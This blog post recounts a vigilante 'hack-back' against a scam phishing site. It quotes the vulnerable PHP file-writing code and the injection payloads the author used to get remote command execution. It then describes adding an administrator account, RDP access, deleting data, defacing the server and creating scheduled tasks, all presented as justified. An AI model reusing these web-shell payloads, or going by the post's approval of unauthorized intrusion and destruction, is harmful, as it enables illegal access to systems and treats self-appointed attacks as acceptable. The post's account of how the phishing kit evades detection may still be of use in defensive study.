Destroying The Scammers Portal

Shashwat Kumar

Published in

InfoSec Write-ups

4 min readNov 8, 2022

Greetings to all readers,

This is the continuation of our previous story Hacking Into Scammers Portal where we hacked into the scammers Portal.

Introduction

As mentioned in the previous article, our friend Sri received a message about Income Tax Refund indicating his income tax has been miscalculated, and to receive a refund he should follow a link and install an application.

So we did some pentesting on the website and found a ‘Local File Disclosure’ vulnerability through which we were able to get access to their database.

We deleted the database and placed a message to stop this but the scammers didn’t stop and continued to scam people and steal data through it.

The Final Chapter

So, this time we thought why not teach this scammer a lesson?

We continued to pentest the application and came across the phishing pages hosted by the scammer.

The phishing page asks the victim for their personal data along with bank details with ATM Pin and net banking details.

The links were redirected from Refund/xxx.php to some random directory and file.

We read the PHP file through LFD and found, it was creating a random directory and copying the contents of the phishing page in it.
Once the victims enter their details the data gets stored in the database and this directory gets deleted.

Even if details are not entered the files are removed after some time by comparing the previous time in robo.txt and roboretired.txt
So the phishing page gets activated temporarily and as soon the work is done the directory gets deleted leaving no sign of phishing.

This makes crawlers and detection mechanisms hard to detect that this server is being used for phishing attacks.

The files were

Configuration.php File

Logs Management File

From this page, the scammer manages and checks all the details fetched through phishing.

After looking at each file I found a way to upload a shell.

Exploitation

The phishing PHP script had following lines -

$page = $p1.$p2.$p3.$p4.$pg.$p5.”\n\$owner = ‘$owner’;”.$p6;
$file1 = $absrand.”/pg.php”;
$fh = fopen($file1,”w”) or die(“Unable to open file!”);
fwrite($fh,$page);
fclose($fh);
return $result;

If we look at the above statement we get to know that apart from all txt files it’s creating a PHP file also with the contents from parameters $p-$p6.

Luckily few parameters were taking data directly from $_GET .
So I modified the parameter to put phpinfo() in the file.

Payload — taz’; phpinfo();$gg=’

This created a random directory with a PHP file and upon accessing it we get to see the PHPINFO page

For getting shell.

Payload- ‘%3b var_dump(system(%24_GET[1]))%3b%24gg=’

Output

The xampp was running as administrator so it was easy to add a user and get access to RDP.

Now few things that we did were.

Deleted all the phishing files and data.
Changed the administrator background and index page to send a message.
Created scheduled task for performing the above tasks.
Reported everything to the hosting provider.
Card details are also being shared with respective banks so that they can block and take necessary actions.